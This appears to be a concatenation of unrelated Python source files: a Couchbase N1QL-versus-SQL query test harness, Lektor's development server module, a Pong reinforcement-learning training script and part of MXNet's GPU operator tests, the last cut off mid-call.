for n1ql_query in query_template_list:
sql_n1ql_index_map = conversion_func(n1ql_query, conversion_map)
query_input_list.append(sql_n1ql_index_map)
# build indexes
if self.use_secondary_index:
self._generate_secondary_indexes_in_batches(query_input_list)
thread_list = []
test_case_number = start_test_case_number
for test_case_input in query_input_list:
if self.use_new_rqg:
t = threading.Thread(target=self._run_basic_test_new, args=(test_case_input, test_case_number, result_queue, failure_record_queue))
else:
t = threading.Thread(target=self._run_basic_test, args=(test_case_input, test_case_number, result_queue, failure_record_queue))
test_case_number += 1
t.daemon = True
t.start()
thread_list.append(t)
# Drop all the secondary Indexes
for t in thread_list:
t.join()
if self.use_secondary_index and self.drop_secondary_indexes:
self._drop_secondary_indexes_in_batches(query_input_list)
else:
count += 1
if count > 1000:
return
def _run_basic_test_new(self, query_test_map, test_case_number, result_queue, failure_record_queue=None):
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< BEGIN RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
n1ql_query = query_test_map["n1ql"]
sql_query = query_test_map["sql"]
indexes = query_test_map["indexes"]
expected_result = query_test_map["expected_result"]
tests_to_run = query_test_map['tests']
# results dict
result_run = dict()
result_run["n1ql_query"] = n1ql_query
result_run["sql_query"] = sql_query
result_run["test_case_number"] = test_case_number
# run the query
for test in tests_to_run:
if test == "BASIC":
if self.check_explain_plan:
result_run['check_explain_plan'] = self._check_explain_plan_for_secondary_index(n1ql_query=n1ql_query);
if self.use_new_rqg:
result_run["run_query_without_index_hint"] = self._run_queries_and_verify_new(n1ql_query=n1ql_query,
sql_query=sql_query,
expected_result=expected_result)
else:
result_run["run_query_without_index_hint"] = self._run_queries_and_verify(subquery=self.subquery,
n1ql_query=n1ql_query,
sql_query=sql_query,
expected_result=expected_result)
else:
print("Unknown test type to run")
exit(1)
result_queue.put(result_run)
self._check_and_push_failure_record_queue(result_run, query_test_map, failure_record_queue)
self.query_count += 1
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< END RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
def _run_queries_and_verify_new(self, n1ql_query=None, sql_query=None, expected_result=None):
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
client = RQGMySQLClientNew(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
try:
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server, scan_consistency="request_plus")
n1ql_result = actual_result["results"]
# Run SQL Query
sql_result = expected_result
if expected_result is None:
columns, rows = client._execute_query(query=sql_query)
self.log.info(" result from n1ql query returns {0} items".format(len(n1ql_result)))
self.log.info(" result from sql query returns {0} items".format(len(rows)))
sql_result = self._gen_json_from_results(columns, rows)
if len(n1ql_result) != len(sql_result):
self.log.info("number of results returned from sql and n1ql are different")
self.log.info("sql query is {0}".format(sql_query))
self.log.info("n1ql query is {0}".format(n1ql_query))
if (len(sql_result) == 0 and len(n1ql_result) == 1) or (len(n1ql_result) == 0 and len(sql_result) == 1) or (len(sql_result) == 0):
return {"success": True, "result": "Pass"}
return {"success": False, "result": str("different results")}
try:
self._verify_results_rqg_new(sql_result=sql_result, n1ql_result=n1ql_result)
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
return {"success": False, "result": str(ex)}
return {"success": True, "result": "Pass"}
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
return {"success": False, "result": str(ex)}
finally:
client._close_connection()
def _gen_json_from_results(self, columns, rows):
data = []
# Convert to JSON and capture in a dictionary
for row in rows:
index = 0
map = {}
for column in columns:
value = row[index]
converted_val = self._convert_to_mysql_json_compatible_val(value, column["type"])
if converted_val is not None:
map[column["column_name"]] = converted_val
index += 1
data.append(map)
return data
def _convert_to_mysql_json_compatible_val(self, value, type):
if value is None:
return None
elif isinstance(value, float):
return round(value, 0)
elif "tiny" in str(type):
if value == 0:
return False
elif value == 1:
return True
else:
return None
elif "int" in str(type):
return value
elif "long" in str(type):
return value
elif "datetime" in str(type):
return str(value)
elif ("float" in str(type)) or ("double" in str(type)):
return round(value, 0)
elif "decimal" in str(type):
if isinstance(value, float):
return round(value, 0)
else:
return int(round(value, 0))
else:
return unicode(value)
def _verify_results_rqg_new(self, n1ql_result=[], sql_result=[]):
new_n1ql_result = []
for result in n1ql_result:
new_n1ql_result.append(result)
n1ql_result = new_n1ql_result
actual_result = n1ql_result
actual_result = sorted(actual_result)
expected_result = sorted(sql_result)
if len(actual_result) != len(expected_result):
extra_msg = self._get_failure_message(expected_result, actual_result)
raise Exception("Results are incorrect. Actual num %s. Expected num: %s. :: %s \n" % (len(actual_result), len(expected_result), extra_msg))
msg = "The number of rows match but the results mismatch, please check"
sorted_actual = self._sort_data(actual_result)
sorted_expected = self._sort_data(expected_result)
combined_results = zip(sorted_expected, sorted_actual)
for item in combined_results:
expected = item[0]
actual = item[1]
for result in expected:
if result not in actual:
extra_msg = self._get_failure_message(expected_result, actual_result)
raise Exception(msg+"\n "+extra_msg)
def _sort_data(self, result):
new_data = []
for data in result:
new_data.append(sorted(data))
return new_data
def _get_failure_message(self, expected_result, actual_result):
if expected_result is None:
expected_result = []
if actual_result is None:
actual_result = []
len_expected_result = len(expected_result)
len_actual_result = len(actual_result)
len_expected_result = min(5, len_expected_result)
len_actual_result = min(5, len_actual_result)
extra_msg = "mismatch in results :: expected :: {0}, actual :: {1} ".format(expected_result[0:len_expected_result], actual_result[0:len_actual_result])
return extra_msg
def _initialize_rqg_query_helper(self):
return RQGQueryHelperNew()
def _initialize_mysql_client(self):
if self.reset_database:
self.client = RQGMySQLClientNew(host=self.mysql_url, user_id=self.user_id, password=self.password)
if self.subquery:
path = "b/resources/rqg/{0}/database_definition/definition-subquery.sql".format(self.database)
else:
path = "b/resources/rqg/{0}/database_definition/definition.sql".format(self.database)
self.database = self.database+"_"+str(self.query_helper._random_int())
populate_data = False
if not self.populate_with_replay:
populate_data = True
if self.subquery:
self.client.reset_database_add_data(database=self.database, items=self.items, sql_file_definiton_path=path, populate_data=populate_data, number_of_tables=1)
else:
self.client.reset_database_add_data(database=self.database, items=self.items, sql_file_definiton_path=path, populate_data=populate_data, number_of_tables=self.number_of_buckets)
self._copy_table_for_merge()
else:
self.client = RQGMySQLClientNew(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
def _run_queries_and_verify(self, aggregate=False, subquery=False, n1ql_query=None, sql_query=None, expected_result=None):
if not self.create_primary_index:
n1ql_query = n1ql_query.replace("USE INDEX(`#primary` USING GSI)", " ")
if self.prepared:
n1ql_query = "PREPARE " + n1ql_query
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
# Run n1ql query
if self.test_name and self.test_name == 'window_functions':
hints = []
else:
hints = self.query_helper._find_hints(sql_query)
for i, item in enumerate(hints):
if "simple_table" in item:
hints[i] = hints[i].replace("simple_table", self.database+"_"+"simple_table")
try:
if subquery:
query_params = {'timeout': '1200s'}
else:
query_params={}
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server, query_params=query_params, scan_consistency="request_plus")
if self.prepared:
name = actual_result["results"][0]['name']
prepared_query = "EXECUTE '%s'" % name
self.log.info(" N1QL QUERY :: {0}".format(prepared_query))
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=prepared_query, server=self.n1ql_server, query_params=query_params, scan_consistency="request_plus")
n1ql_result = actual_result["results"]
# Run SQL Query
sql_result = expected_result
client = None
if self.use_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
elif self.use_postgres:
client = RQGPostgresClient()
if expected_result is None:
columns, rows = client._execute_query(query=sql_query)
if self.aggregate_pushdown:
sql_result = client._gen_json_from_results_repeated_columns(columns, rows)
else:
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
self.log.info(" result from n1ql query returns {0} items".format(len(n1ql_result)))
self.log.info(" result from sql query returns {0} items".format(len(sql_result)))
if len(n1ql_result) != len(sql_result):
self.log.info("number of results returned from sql and n1ql are different")
self.log.info("sql query is {0}".format(sql_query))
self.log.info("n1ql query is {0}".format(n1ql_query))
if (len(sql_result) == 0 and len(n1ql_result) == 1) or (len(n1ql_result) == 0 and len(sql_result) == 1) or (len(sql_result) == 0):
return {"success": True, "result": "Pass"}
return {"success": False, "result": str("different results")}
try:
self.n1ql_helper._verify_results_rqg(subquery, aggregate, sql_result=sql_result, n1ql_result=n1ql_result, hints=hints, aggregate_pushdown=self.aggregate_pushdown)
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
return {"success": False, "result": str(ex)}
return {"success": True, "result": "Pass"}
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
return {"success": False, "result": str(ex)}
|
devserver.py
|
import os
import threading
import time
import traceback
from werkzeug.serving import run_simple
from werkzeug.serving import WSGIRequestHandler
from lektor.admin import WebAdmin
from lektor.builder import Builder
from lektor.db import Database
from lektor.reporter import CliReporter
from lektor.utils import portable_popen
from lektor.utils import process_extra_flags
from lektor.watcher import Watcher
class SilentWSGIRequestHandler(WSGIRequestHandler):
def log(self, type, message, *args):
pass
class BackgroundBuilder(threading.Thread):
def __init__(self, env, output_path, prune=True, verbosity=0, extra_flags=None):
threading.Thread.__init__(self)
self.env = env
self.output_path = output_path
self.prune = prune
self.verbosity = verbosity
self.last_build = time.time()
self.extra_flags = extra_flags
def build(self, update_source_info_first=False):
try:
db = Database(self.env)
builder = Builder(
db.new_pad(), self.output_path, extra_flags=self.extra_flags
)
if update_source_info_first:
builder.update_all_source_infos()
builder.build_all()
if self.prune:
builder.prune()
except Exception:
traceback.print_exc()
else:
self.last_build = time.time()
def run(self):
with CliReporter(self.env, verbosity=self.verbosity):
self.build(update_source_info_first=True)
with Watcher(self.env, self.output_path) as watcher:
for ts, _, _ in watcher:
if self.last_build is None or ts > self.last_build:
self.build()
class DevTools:
"""This builds the admin frontend (in watch mode)."""
def __init__(self, env):
self.watcher = None
self.env = env
def start(self):
if self.watcher is not None:
return
frontend = os.path.join(os.path.dirname(__file__), "..", "frontend")
portable_popen(["npm", "install"], cwd=frontend).wait()
self.watcher = portable_popen(["npm", "run", "dev"], cwd=frontend)
def stop(self):
if self.watcher is None:
return
self.watcher.kill()
self.watcher.wait()
self.watcher = None
def browse_to_address(addr):
# pylint: disable=import-outside-toplevel
import webbrowser
def browse():
time.sleep(1)
webbrowser.open("http://%s:%s" % addr)
t = threading.Thread(target=browse)
t.daemon = True
t.start()
def run_server(
bindaddr,
env,
output_path,
prune=True,
verbosity=0,
lektor_dev=False,
ui_lang="en",
browse=False,
extra_flags=None,
):
"""This runs a server but also spawns a background process. It's
not safe to call this more than once per python process!
"""
wz_as_main = os.environ.get("WERKZEUG_RUN_MAIN") == "true"
in_main_process = not lektor_dev or wz_as_main
extra_flags = process_extra_flags(extra_flags)
if lektor_dev:
env.jinja_env.add_extension("jinja2.ext.debug")
if in_main_process:
background_builder = BackgroundBuilder(
env,
output_path=output_path,
prune=prune,
verbosity=verbosity,
extra_flags=extra_flags,
)
background_builder.daemon = True
background_builder.start()
env.plugin_controller.emit(
"server-spawn", bindaddr=bindaddr, extra_flags=extra_flags
)
app = WebAdmin(
env,
output_path=output_path,
verbosity=verbosity,
debug=lektor_dev,
ui_lang=ui_lang,
extra_flags=extra_flags,
)
dt = None
if lektor_dev and not wz_as_main:
dt = DevTools(env)
dt.start()
if browse:
browse_to_address(bindaddr)
try:
return run_simple(
bindaddr[0],
bindaddr[1],
app,
use_debugger=True,
threaded=True,
use_reloader=lektor_dev,
request_handler=WSGIRequestHandler
if lektor_dev
else SilentWSGIRequestHandler,
)
finally:
if dt is not None:
dt.stop()
if in_main_process:
env.plugin_controller.emit("server-stop")
|
__main__.py
|
import logging
import sys
from multiprocessing import Pipe, Process
from operator import itemgetter
from pathlib import Path
import numpy as np
from pong_rl.agents import AgentKerasConv
from pong_rl.environments import PongEnvironment, VectorizedPongEnvironment
from pong_rl.timer import ContextTimer
MODEL_NAME = "convolution_v1"
MODEL_FILE = f"{MODEL_NAME}.h5"
EPISODE_FILE = f"{MODEL_NAME}.episode"
SAVED_MODEL = Path("data", MODEL_FILE)
SAVED_EPISODE = Path("data", EPISODE_FILE)
def get_logger(name, level=logging.INFO):
""" Create logger for main process. """
logger = logging.getLogger(name)
log_format = "[%(asctime)s] %(message)s"
date_format = "%d.%m.%Y %H:%M:%S"
formatter = logging.Formatter(log_format, date_format)
file_handler = logging.FileHandler(Path("log", f"{name}.log"))
file_handler.setFormatter(formatter)
file_handler.setLevel(level)
logger.addHandler(file_handler)
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setFormatter(formatter)
console_handler.setLevel(level)
logger.addHandler(console_handler)
logger.setLevel(level)
return logger
def renderer(pipe, environment, saved_model, agent_class):
""" Receive actual agent from pipe and render it in provided environment. """
print("[render_process]: Render process started")
agent = agent_class(environment.actions_len, environment.observation_shape)
print("[render_process]: Awaiting for new agent data")
_ = pipe.recv()
print("[render_process]: Received agent update signal")
if saved_model.exists():
agent._model.load_weights(saved_model)
print("[render_process]: Loaded Weights")
else:
print("[render_process]: Model loading failed")
print("[render_process]: Starting episodes rendering")
should_run = True
while should_run:
environment.play_episode(agent, render=True)
if pipe.poll():
episode = pipe.recv()
if saved_model.exists():
agent._model.load_weights(saved_model)
print(f"[render_process]: Received and updated new agent from episode {episode}")
else:
print("[render_process]: Model loading failed")
def main():
np.set_printoptions(precision=4, floatmode="maxprec", edgeitems=16, linewidth=1200)
log = get_logger(MODEL_NAME, logging.INFO)
pong = VectorizedPongEnvironment(num_environments=64)
pong_render = PongEnvironment()
saved_model = SAVED_MODEL
saved_episode = SAVED_EPISODE
agent_class = AgentKerasConv
log.info("Starting rendering process")
child_pipe, parent_pipe = Pipe()
render_process = Process(
target=renderer, args=(child_pipe, pong_render, saved_model, agent_class)
)
render_process.start()
agent = agent_class(pong.actions_len, pong.observation_shape, learning_rate=1e-4)
if saved_model.exists():
log.info("Loading saved model weights")
agent._model.load_weights(saved_model)
else:
log.info(f"Cannot find model data in path: {saved_model.absolute()}")
log.info(f"Agent summary:\n{agent.summary}")
if saved_episode.exists():
episode = int(saved_episode.read_text())
else:
episode = 0
should_train = True
while should_train:
log.info(f"Starting [{episode}] episode")
with ContextTimer("Episode Timer", log):
ep_observations, ep_actions, ep_rewards, ep_score = pong.play_episode(
agent, render=False
)
positive_rewards = ep_rewards >= 0
positive_rewards_num = len(ep_rewards[positive_rewards])
negative_rewards = ep_rewards < 0
negative_rewards_num = len(ep_rewards[negative_rewards])
rewards_ratio = negative_rewards_num / positive_rewards_num
log.info(f"Episode [{episode}] rewards len positive: {positive_rewards_num}")
log.info(f"Episode [{episode}] rewards len negative: {negative_rewards_num}")
if positive_rewards_num < negative_rewards_num:
log.info(f"Rebalancing rewards with positive/negative ratio is {rewards_ratio}")
ep_rewards[positive_rewards] *= rewards_ratio
log.info(f"Episode [{episode}] observations number: {len(ep_observations)}")
log.info(f"Episode [{episode}] score: {ep_score.astype(np.int)}")
log.info(f"Episode [{episode}] average score: {np.average(ep_score)}")
log.info(f"Episode [{episode}] max score: {np.max(ep_score)}")
unique_actions, actions_num = np.unique(ep_actions, axis=0, return_counts=True)
unique_actions = [list(a) for a in list(unique_actions.astype(np.int))]
actions_percent = np.rint(actions_num / np.sum(actions_num) * 100).astype(np.int)
actions_stats = sorted(zip(unique_actions, actions_num, actions_percent), key=itemgetter(0))
log.info(f"Actions statistics: {actions_stats}")
log.info(f"Rewards:\n {ep_rewards}")
if len(ep_observations) > 0:
with ContextTimer("Training Timer", log):
train_metrics = agent.train(
ep_observations,
ep_actions,
ep_rewards,
batch_size=1024,
)
log.info(f"Episode {episode} train metrics: {train_metrics.history}")
else:
log.info("No training data available, skip training")
log.info("Saving model weights")
agent._model.save_weights(saved_model)
saved_episode.write_text(str(episode))
log.info("Updating rendering agent")
parent_pipe.send(episode)
episode += 1
render_process.join()
if __name__ == "__main__":
main()
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import mxnet as mx
import numpy as np
import pytest
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal, assert_allclose
from mxnet.test_utils import check_symbolic_forward, check_symbolic_backward, discard_stderr
from mxnet.test_utils import default_context, rand_shape_2d, rand_ndarray, same
from mxnet.base import MXNetError
from mxnet import autograd
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed, teardown_module, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied
from common import run_in_spawned_process
from test_operator import check_sequence_reverse, allclose_function
from test_operator import *
from test_numpy_ndarray import *
from test_numpy_op import *
from test_numpy_interoperability import *
from test_gluon_probability_v1 import *
from test_gluon_probability_v2 import *
from test_optimizer import *
from test_random import *
from test_exc_handling import *
from test_sparse_ndarray import *
from test_sparse_operator import *
from test_ndarray import *
from test_subgraph_op import *
from test_gluon_gpu import _test_bulking
from test_contrib_operator import test_multibox_target_op
from test_contrib_optimizer import test_adamw
del test_custom_op_fork #noqa
set_default_context(mx.gpu(0))
def check_countsketch(in_dim,out_dim,n):
data = mx.sym.Variable("data")
h = mx.sym.Variable("h")
s = mx.sym.Variable("s")
sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
locations = {"data": x, "h": h, "s": s}
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
@with_seed()
@pytest.mark.serial
def test_countsketch():
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1, maxn)
check_countsketch(in_dim, out_dim, n)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym._simple_bind(**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0], rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[3],rtol=1e-3, atol=1e-5)
@with_seed()
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
def _make_ndarrays(input_list, ctx=mx.gpu(0)):
return [mx.nd.array(arr, dtype=arr.dtype, ctx=ctx) for arr in input_list]
def check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2):
values_arr = [np.random.rand(*shape).astype(dtype) * 10. for shape in shapes]
mx_vals = _make_ndarrays(values_arr, ctx=ctx)
sum_sq = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
sum_sq2 = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
# checks that operator is deterministic
assert np.array_equal(sum_sq.asnumpy(), sum_sq2.asnumpy())
ref_sum_sq = mx.nd.array([(v.astype('float32') ** 2).sum() for v in values_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_sum_sq.asnumpy(), sum_sq.asnumpy(), atol=tol1, rtol=tol1)
@with_seed()
@pytest.mark.serial
def test_multi_sum_sq():
min_nparam = 100
max_nparam = 120
min_dim = 50000
max_dim = 100000
max_ndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.gpu(0)]:
for dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(min_dim, max_dim + 1, size=max_ndim) for i in range(nparam)]
low_tol = ctx == mx.cpu(0) and ('float16'in [dtype])
tol1 = 1e-3 if low_tol else 1e-5
tol2 = 1e-6 if low_tol else 1e-7
check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2)
def check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2):
weights_arr = [np.random.rand(*shape).astype(w_dtype) * 10. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(g_dtype) for shape in shapes]
lrs = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 100.
wds = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 1000.
eta = (np.random.rand() + 0.1)
eps = (np.random.rand() + 0.1) / 10000.
mx_w = _make_ndarrays(weights_arr, ctx=ctx)
mx_g = _make_ndarrays(grads_arr, ctx=ctx)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=ctx)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=ctx)
w_sum_sq = mx.nd.multi_sum_sq(*mx_w, num_arrays=len(shapes))
g_sum_sq = mx.nd.multi_sum_sq(*mx_g, num_arrays=len(shapes))
ref_w_sum_sq = mx.nd.array([(w.astype('float32') ** 2).sum() for w in weights_arr],
dtype='float32', ctx=ctx)
ref_g_sum_sq = mx.nd.array([(g.astype('float32') ** 2).sum() for g in grads_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_w_sum_sq.asnumpy(), w_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
assert_almost_equal(ref_g_sum_sq.asnumpy(), g_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
rescale_grad = (np.random.rand() + 0.5) * 100.
mx_new_lrs = mx.nd.multi_lars(mx_lrs, w_sum_sq, g_sum_sq, mx_wds, eta=eta, eps=eps,
rescale_grad=rescale_grad)
ref_w_l2norm = mx.nd.sqrt(ref_w_sum_sq)
ref_g_l2norm = mx.nd.sqrt(ref_g_sum_sq * rescale_grad * rescale_grad)
ref_new_lrs = mx.nd.zeros(ref_w_l2norm.shape, dtype='float32', ctx=ctx)
for i in range(ref_w_l2norm.size):
_w = ref_w_l2norm[i]
_g = ref_g_l2norm[i]
if _w > 0.0 and _g > 0.0:
ref_new_lrs[i] = lrs[i] * eta * _w / (_g + wds[i] * _w + eps)
else:
ref_new_lrs[i] = lrs[i]
assert_almost_equal(ref_new_lrs.asnumpy(), mx_new_lrs.asnumpy(), atol=tol2, rtol=tol2)
@with_seed()
@pytest.mark.serial
def test_fast_lars():
min_nparam = 50
max_nparam = 60
maxdim = 10000
maxndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.cpu(0), mx.gpu(0)]:
for w_dtype in dtypes:
for g_dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
lowTol = ctx == mx.cpu(0) and ('float16'in [w_dtype, g_dtype])
tol1 = 1e-3 if lowTol else 1e-5
tol2 = 1e-6 if lowTol else 1e-7
check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2)
def check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights):
def _flatten_list(nested_list):
return [item for sublist in nested_list for item in sublist]
weights_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
rescale_grad = (np.random.random() + 1.0)
mx_w = _make_ndarrays(weights_arr)
mx_g = _make_ndarrays(grads_arr)
mx_p_w = _make_ndarrays(weights_arr)
mx_p_g = _make_ndarrays(grads_arr)
lrs = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 100.)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=mx.gpu(0))
wds = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 1000.)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=mx.gpu(0))
if use_master_weights:
weights32_arr = [arr.astype('float32') for arr in weights_arr]
mx_w32 = _make_ndarrays(weights32_arr)
mx_p_w32 = _make_ndarrays(weights32_arr)
if momentum is None:
if use_master_weights:
mx.nd.multi_mp_sgd_update(
*_flatten_list(zip(mx_w, mx_g, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
mx.nd.preloaded_multi_mp_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
out = mx.nd.multi_sgd_update(
*_flatten_list(zip(mx_w, mx_g)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
if use_master_weights:
momentums_arr = [np.random.rand(*shape).astype("float32") for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
out = mx.nd.multi_mp_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_mp_sgd_mom_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
else:
momentums_arr = [np.random.rand(*shape).astype(dtype) for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
mx.nd.multi_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
mx.nd.preloaded_multi_sgd_mom_update(
